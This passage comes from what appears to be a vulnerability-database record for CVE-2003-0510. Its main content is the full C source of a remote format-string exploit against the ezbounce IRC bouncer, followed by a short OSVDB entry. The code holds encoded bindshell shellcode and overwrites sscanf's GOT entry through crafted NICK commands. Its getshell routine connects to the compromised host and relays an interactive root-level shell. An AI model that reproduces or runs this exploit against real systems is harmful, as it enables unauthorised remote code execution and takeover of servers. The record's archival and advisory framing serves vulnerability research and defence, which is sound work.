(0x080646e0+750)\r\n/* has to connect to something that doesn't */\r\n/* disconnect. (this cannot be the same as the */\r\n/* bounce port) */\r\n#define CONNECT_TO \"localhost:25\"\r\n#define CODESIZE 1000 /* nops+shellcode buffer. */\r\n#define FMTSIZE 32 /* max format string size. */\r\n#define TIMEOUT 15 /* connection timeout. */\r\n/* taken from another exploit, works perfect for this. */\r\nstatic char x86_exec[]= /* bindshell(45295)&, netric/S-poly. */\r\n \"\\x57\\x5f\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\xc8\\x80\\x44\\x0e\\xff\\x2b\\x49\"\r\n \"\\x41\\x49\\x75\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\\x06\\x95\\x06\\xb0\"\r\n \"\\x06\\x9e\\x26\\x86\\xdb\\x26\\x86\\xd6\\x26\\x86\\xd7\\x26\\x5e\\xb6\\x88\"\r\n \"\\xd6\\x85\\x3b\\xa2\\x55\\x5e\\x96\\x06\\x95\\x06\\xb0\\x25\\x25\\x25\\x3b\"\r\n \"\\x3d\\x85\\xc4\\x88\\xd7\\x3b\\x28\\x5e\\xb7\\x88\\xe5\\x28\\x88\\xd7\\x27\"\r\n \"\\x26\\x5e\\x9f\\x5e\\xb6\\x85\\x3b\\xa2\\x55\\x06\\xb0\\x0e\\x98\\x49\\xda\"\r\n \"\\x06\\x95\\x15\\xa2\\x55\\x06\\x95\\x25\\x27\\x5e\\xb6\\x88\\xd9\\x85\\x3b\"\r\n \"\\xa2\\x55\\x5e\\xac\\x06\\x95\\x06\\xb0\\x06\\x9e\\x88\\xe6\\x86\\xd6\\x85\"\r\n \"\\x05\\xa2\\x55\\x06\\x95\\x06\\xb0\\x25\\x25\\x2c\\x5e\\xb6\\x88\\xda\\x85\"\r\n \"\\x3b\\xa2\\x55\\x5e\\x9b\\x06\\x95\\x06\\xb0\\x85\\xd7\\xa2\\x55\\x0e\\x98\"\r\n \"\\x4a\\x15\\x06\\x95\\x5e\\xd0\\x85\\xdb\\xa2\\x55\\x06\\x95\\x06\\x9e\\x5e\"\r\n \"\\xc8\\x85\\x14\\xa2\\x55\\x06\\x95\\x16\\x85\\x14\\xa2\\x55\\x06\\x95\\x16\"\r\n \"\\x85\\x14\\xa2\\x55\\x06\\x95\\x25\\x3d\\x04\\x04\\x48\\x3d\\x3d\\x04\\x37\"\r\n \"\\x3e\\x43\\x5e\\xb8\\x60\\x29\\xf9\\xdd\\x25\\x28\\x5e\\xb6\\x85\\xe0\\xa2\"\r\n \"\\x55\\x06\\x95\\x15\\xa2\\x55\\x06\\x95\\x5e\\xc8\\x85\\xdb\\xa2\\x55\\xc0\"\r\n \"\\x6e\";\r\nchar *getfmt(unsigned short);\r\nchar *getcode(void);\r\nchar *eberror(short);\r\nshort ebconnect(char *hostname,unsigned short port,\r\nchar *,char *,signed short);\r\nvoid getshell(char *,unsigned short);\r\nvoid printe(char *,short);\r\nvoid sig_alarm(){printe(\"alarm/timeout hit\",1);}\r\nint main(int argc,char **argv){\r\n short r=0;\r\n /* banner fun. */\r\n fprintf(stderr,\r\n \"[*] ezbounce[v1.0+]: remote format string exploit.\\n[*] by:\"\r\n \" vade79/v9 v9@fakehalo.deadpig.org (fakehalo)\\n\\n\");\r\n if(argc<5){\r\n fprintf(stderr,\"[!] syntax: %s <hostname> <port> <user> <pa\"\r\n \"ss>\\n\",argv[0]);\r\n exit(1);\r\n }\r\n signal(SIGPIPE,SIG_IGN);\r\n /* ugly brute force. */\r\n /* change sscanf()'s GOT: 0xFFFF0000. */\r\n fprintf(stderr,\"[*] sending format string(0xFFFF0000): \");\r\n r=ebconnect(argv[1],atoi(argv[2]),argv[3],argv[4],0);\r\n fprintf(stderr,\"%s.\\n\",eberror(r));\r\n /* change sscanf()'s GOT: 0x0000FFFF. */\r\n fprintf(stderr,\"[*] sending format string(0x0000FFFF): \");\r\n r=ebconnect(argv[1],atoi(argv[2]),argv[3],argv[4],1);\r\n fprintf(stderr,\"%s.\\n\",eberror(r));\r\n /* ECHO <shellcode>, and run LOG FIND(uses sscanf()). */\r\n fprintf(stderr,\"[*] sending shellcode, and enabling: \");\r\n r=ebconnect(argv[1],atoi(argv[2]),argv[3],argv[4],2);\r\n fprintf(stderr,\"%s.\\n\",eberror(r));\r\n getshell(argv[1],45295); /* defined in shellcode. */\r\n fprintf(stderr,\"[!] exploit failed.\\n\");\r\n exit(0);\r\n}\r\nchar *getfmt(unsigned short type){\r\n unsigned int addr1,addr2;\r\n unsigned int pops=POPS;\r\n unsigned long sscanfgot=SSCANF_GOT_ADDR;\r\n unsigned long addr=RET_ADDR;\r\n char *buf;\r\n char taddr[3];\r\n taddr[0]=(sscanfgot&0xff000000)>>24;\r\n taddr[1]=(sscanfgot&0x00ff0000)>>16;\r\n taddr[2]=(sscanfgot&0x0000ff00)>>8;\r\n taddr[3]=(sscanfgot&0x000000ff);\r\n addr1=(addr&0xffff0000)>>16;\r\n addr2=(addr&0x0000ffff);\r\n if(!(buf=(char *)malloc(FMTSIZE+1)))\r\n printe(\"getfmt(): allocating memory failed\",1);\r\n memset(buf,0x0,(FMTSIZE+1));\r\n if(!type)\r\n sprintf(buf,\r\n \"%c%c%c%c\"\r\n \"%%.%dd%%%d$hn\",\r\n taddr[3]+2,taddr[2],taddr[1],taddr[0],\r\n (addr1-9),pops); /* 4=addr + 5=pre bytes(could be 4). */\r\n else if(type==1)\r\n sprintf(buf,\r\n \"%c%c%c%c\"\r\n \"%%.%dd%%%d$hn\",\r\n taddr[3],taddr[2],taddr[1],taddr[0],\r\n (addr2-9),pops); /* 4=addr + 5=pre bytes(could be 4). */\r\n else if(type>1)\r\n sprintf(buf,\"x\");\r\n return(buf);\r\n}\r\nchar *getcode(void){\r\n char *buf;\r\n if(!(buf=(char *)malloc(CODESIZE+1)))\r\n printe(\"getcode(): allocating memory failed\",1);\r\n memset(buf,0x90,(CODESIZE-strlen(x86_exec)));\r\n memcpy(buf+(CODESIZE-strlen(x86_exec)),x86_exec,\r\n strlen(x86_exec));\r\n return(buf);\r\n}\r\nchar *eberror(short err){\r\n return(err?\"failed\":\"success\");\r\n}\r\nshort ebconnect(char *hostname,unsigned short port,\r\nchar *user,char *pass,signed short type){\r\n int sock;\r\n struct hostent *t;\r\n struct sockaddr_in s;\r\n /* see what actually happens, for testing. */\r\n#ifdef DEBUG\r\n sock=1; /* stdout. */\r\n#else\r\n sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n s.sin_family=AF_INET;\r\n s.sin_port=htons(port);\r\n if((s.sin_addr.s_addr=inet_addr(hostname))){\r\n if(!(t=gethostbyname(hostname)))\r\n return(1);\r\n memcpy((char*)&s.sin_addr,(char*)t->h_addr,\r\n sizeof(s.sin_addr));\r\n }\r\n signal(SIGALRM,sig_alarm);\r\n alarm(TIMEOUT);\r\n if(connect(sock,(struct sockaddr *)&s,sizeof(s)))\r\n return(1);\r\n alarm(0);\r\n#endif\r\n dprintf(sock,\"USER x\\n\");\r\n usleep(250000);\r\n dprintf(sock,\"NICK %s\\n\",(type==2?\"x\":getfmt(type)));\r\n usleep(250000);\r\n dprintf(sock,\"PASS %s:%s\\n\",user,pass);\r\n usleep(250000);\r\n /* 2 = don't change any address, just enable. */\r\n if(type==2){\r\n /* puts the shellcode into memory. (on */\r\n /* top of the dynamic __mbuffer[]) */\r\n dprintf(sock,\"ECHO %s\\n\",getcode());\r\n usleep(250000);\r\n /* \"LOG FIND\" uses sscanf(), GOT that got changed. */\r\n /* (don't need any user options to run the command) */\r\n dprintf(sock,\"LOG FIND\\n\");\r\n }\r\n /* !2 = change address. */\r\n else{\r\n /* have to connect to something to detach. */\r\n /* can't be the same port as the bnc. */\r\n dprintf(sock,\"CONN \"CONNECT_TO\"\\n\");\r\n sleep(1);\r\n dprintf(sock,\"EZB detach\\n\");\r\n }\r\n sleep(1);\r\n /* if stdout, don't close. */\r\n#ifndef DEBUG\r\n close(sock);\r\n#endif\r\n return(0);\r\n}\r\n/* same thing i use for every remote exploit. :) */\r\nvoid getshell(char *hostname,unsigned short port){\r\n int sock,r;\r\n fd_set fds;\r\n char buf[4096+1];\r\n struct hostent *he;\r\n struct sockaddr_in sa;\r\n if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1){\r\n printe(\"getshell(): socket() failed\",0);\r\n return;\r\n }\r\n sa.sin_family=AF_INET;\r\n if((sa.sin_addr.s_addr=inet_addr(hostname))){\r\n if(!(he=gethostbyname(hostname))){\r\n printe(\"getshell(): couldn't resolve\",0);\r\n return;\r\n }\r\n memcpy((char *)&sa.sin_addr,(char *)he->h_addr,\r\n sizeof(sa.sin_addr));\r\n }\r\n sa.sin_port=htons(port);\r\n signal(SIGALRM,sig_alarm);\r\n alarm(TIMEOUT);\r\n printf(\"[*] attempting to connect: %s:%d.\\n\",\r\n hostname,port);\r\n if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){\r\n printf(\"[!] connection failed: %s:%d.\\n\",\r\n hostname,port);\r\n return;\r\n }\r\n alarm(0);\r\n printf(\"[*] successfully connected: %s:%d.\\n\\n\",\r\n hostname,port);\r\n signal(SIGINT,SIG_IGN);\r\n write(sock,\"uname -a;id\\n\",13);\r\n while(1){\r\n FD_ZERO(&fds);\r\n FD_SET(0,&fds);\r\n FD_SET(sock,&fds);\r\n if(select(sock+1,&fds,0,0,0)<1){\r\n printe(\"getshell(): select() failed\",0);\r\n return;\r\n }\r\n if(FD_ISSET(0,&fds)){\r\n if((r=read(0,buf,4096))<1){\r\n printe(\"getshell(): read() failed\",0);\r\n return;\r\n }\r\n if(write(sock,buf,r)!=r){\r\n printe(\"getshell(): write() failed\",0);\r\n return;\r\n }\r\n }\r\n if(FD_ISSET(sock,&fds)){\r\n if((r=read(sock,buf,4096))<1)\r\n exit(0);\r\n write(1,buf,r);\r\n }\r\n }\r\n close(sock);\r\n return;\r\n}\r\nvoid printe(char *err,short e){\r\n fprintf(stderr,\"(error: %s)\\n\\n\",err);\r\n if(e)\r\n exit(1);\r\n return;\r\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/22848/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0510"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-07/0002.html\nISS X-Force ID: 12486\n[CVE-2003-0510](https://vulners.com/cve/CVE-2003-0510)\nBugtraq ID: 8071\n", "modified": "2003-06-30T21:59:14", "published": "2003-06-30T21:59:14", "href": "https://vulners.com/osvdb/OSVDB:2230", "id": "OSVDB:2230", "type": "osvdb", "title": "ezbounce sessions Command Format String", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}